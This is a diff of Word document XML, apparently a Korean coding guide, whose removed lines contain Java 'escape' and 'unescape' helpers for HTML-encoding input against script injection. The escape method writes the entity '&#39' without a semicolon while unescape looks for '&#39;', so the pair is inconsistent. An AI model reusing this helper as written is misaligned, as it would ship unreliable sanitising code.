+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>싱글쿼터로</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> 치환</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="800"/>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:tab/>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t xml:space="preserve">public static String </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:b/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>escape</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>(String value) {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t xml:space="preserve">Pattern </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>escapePattern</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>Pattern.compile</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>("'");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t>if (value == null) {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t>return null;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t xml:space="preserve">String </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>trustValue</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = StringEscapeUtils.escapeHtml4(value); // &amp;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>lt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>;,</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> &amp;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>gt</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>;, &amp;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>quot</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>; 문자 치환</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t xml:space="preserve">Matcher </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>matcher</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>escapePattern.matcher</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>trustValue</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t>if (</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>matcher.find</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>()) {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t xml:space="preserve">return </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>matcher.replaceAll</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>("&amp;#39"); // &amp;#39 치환</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t xml:space="preserve">return </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>trustValue</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t xml:space="preserve">public static String </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:b/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>unescape</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>(String value) {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t xml:space="preserve">Pattern </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>unescapePattern</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>Pattern.compile</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>("&amp;#39;");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t>if (value == null) {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t>return null;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t xml:space="preserve">String </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>originalValue</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = StringEscapeUtils.unescapeHtml4(value); // &lt;, &gt;, " 치환</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-          </w:p>
-          <w:p>
